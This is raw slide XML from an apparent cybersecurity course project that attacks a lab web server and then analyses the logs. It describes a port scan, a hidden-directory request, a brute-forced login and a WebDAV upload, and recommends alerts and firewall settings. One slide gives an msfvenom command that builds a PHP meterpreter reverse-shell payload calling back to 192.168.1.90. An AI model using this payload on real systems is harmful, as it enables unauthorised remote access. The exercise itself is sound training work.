        <p:nvSpPr>
          <p:cNvPr id="1178" name="Google Shape;1178;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79" name="Google Shape;1179;p65"/>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65"/>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Generated a payload/exploit using Msfvenom to exploit the target machine.</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81" name="Google Shape;1181;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1182" name="Google Shape;1182;p6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83" name="Google Shape;1183;p65"/>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4" name="Google Shape;1184;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1185" name="Google Shape;1185;p6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86" name="Google Shape;1186;p65"/>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7" name="Google Shape;1187;p65"/>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65"/>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Successfully connected and started a meterpreter session, with full access into the target’s OS </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;p65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1190" name="Google Shape;1190;p6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91" name="Google Shape;1191;p65"/>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2" name="Google Shape;1192;p65"/>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65"/>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Command</a:t>
            </a:r>
            <a:endParaRPr b="1"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9900FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=80 &gt;&gt; shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="68961" t="73639"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7037025" y="3446025"/>
            <a:ext cx="1997551" cy="1355850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1195" name="Google Shape;1195;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3129" l="0" r="25700" t="65476"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1473125" y="3373075"/>
            <a:ext cx="5360550" cy="15435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pic>
        <p:nvPicPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p66"/>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201" name="Google Shape;1201;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="88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202" name="Google Shape;1202;p6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Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;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9" name="Google Shape;1209;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270875" y="3898425"/>
            <a:ext cx="81558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Port scan occurred May 3, 2022 between 22:39 - 22:40 </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>544 packets sized 96 -178MB bytes each were sent from 192.168.1.90 </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Port 57266 has the most records compared to the baseline indicating this port was being scanned.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1210" name="Google Shape;1210;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="270875" y="4069587"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1211" name="Google Shape;1211;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1406349" y="674300"/>
            <a:ext cx="5884851" cy="3315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1217" name="Google Shape;1217;p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18" name="Google Shape;1218;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51650" y="618813"/>
            <a:ext cx="101016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The request for the hidden directory occurred on 5/3 at 21:00 and again on 5/7 at  15:00</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>786,613 requests were made, however this number can vary depending on how many times the VSI server was attacked.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The key files requested by the attacker was after was the shell.php file that contained a reverse TCP exploit.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1219" name="Google Shape;1219;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="197100" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1220" name="Google Shape;1220;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1467275" y="1413675"/>
            <a:ext cx="5727049" cy="3243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1226" name="Google Shape;1226;p6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227" name="Google Shape;1227;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007675" y="798950"/>
            <a:ext cx="7229931" cy="4078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233" name="Google Shape;1233;p7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34" name="Google Shape;1234;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="644025"/>
            <a:ext cx="71256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16,725 requests were made in the attack</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>64 requests had been made after the attacker discovered the password</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1235" name="Google Shape;1235;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="98250" y="737862"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1236" name="Google Shape;1236;p70"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1380550" y="1182600"/>
            <a:ext cx="6290154" cy="35573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WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1242" name="Google Shape;1242;p7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43" name="Google Shape;1243;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="644025"/>
            <a:ext cx="57912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143 requests were made to this directory.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-167640" lvl="0" marL="320040" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The webdav/shell/php file was requested.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="85950" y="737862"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1245" name="Google Shape;1245;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1370388" y="1190525"/>
            <a:ext cx="6403225" cy="36646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pic>
        <p:nvPicPr>
          <p:cNvPr id="1250" name="Google Shape;1250;p72"/>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251" name="Google Shape;1251;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1631275"/>
            <a:ext cx="8595300" cy="202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252" name="Google Shape;1252;p7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indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p5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This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p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27" name="Google Shape;1027;p5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8" name="Google Shape;1028;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1029" name="Google Shape;1029;p55"/>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30" name="Google Shape;1030;p55"/>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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1032" name="Google Shape;1032;p5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33" name="Google Shape;1033;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1035" name="Google Shape;1035;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="6213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36" name="Google Shape;1036;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1038" name="Google Shape;1038;p55"/>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39" name="Google Shape;1039;p55"/>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0" name="Google Shape;1040;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12450" y="137882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Network Topology</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041" name="Google Shape;1041;p5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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="223355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45" name="Google Shape;1045;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150" y="30762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46" name="Google Shape;1046;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258" name="Google Shape;1258;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59" name="Google Shape;1259;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3051300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>I recommend setting an alert that will trigger any time traffic moves over port 4444 (or any open port), Additionally, I would </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>recommend</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> setting another alert that will trigger any time a file with the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>extension</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> of .php is uploaded to the server.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>I recommend setting an </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> to be sent once 1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>connections</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> occur within the span of 1 hour</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Google Shape;1260;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4637025" y="14772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b="1" lang="en"/>
              <a:t>IDS or firewall can be configured to block the IP address of detected port scans.</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Create a whitelist of trusted IP address and ensure the firewall security policy prevents all other access</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Ensure any access to the WebDAV folder is only permitted by users with complet username and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Limiting</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>ability</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> to upload files via the manage.web interface to this specific directory</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Ensure only necessary ports are open</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1266" name="Google Shape;1266;p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67" name="Google Shape;1267;p74"/>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300"/>
              <a:t>What kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>It would be beneficial to set an alert to monitor direct file or folder requests across HTTP / Port 80 and send notifications once a threshold of unsuccessful requests or logins occurs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300"/>
              <a:t>The threshold would activate when any folder request being requested</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="13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
        <p:nvSpPr>
          <p:cNvPr id="1268" name="Google Shape;1268;p74"/>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300"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300"/>
              <a:t>onfigurations that can be set on the host to block unwanted access?</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Create User permissions restricting access to specific directories</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
